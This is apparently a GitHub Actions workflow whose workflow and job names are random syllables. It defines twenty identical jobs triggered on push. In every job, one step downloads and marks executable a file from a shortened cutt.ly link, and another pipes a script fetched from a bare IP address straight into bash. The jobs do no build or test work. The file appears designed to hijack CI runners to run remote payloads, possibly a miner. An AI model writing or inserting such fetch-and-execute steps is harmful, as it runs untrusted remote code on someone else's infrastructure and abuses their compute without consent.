name: sawaju
on: push
jobs:
  rabapoxe:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  vocuno:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  jitufi:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  xejopo:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  riyepasu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  cocehi:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  zukuta:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  bonoce:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  mewasipa:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  lufela:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  tepogo:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  gejigumo:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  bijogu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  hegoziwu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  wurihi:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  kedili:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  majecayo:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  xiyifa:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  diruje:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
  gejufi:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=miri | bash -
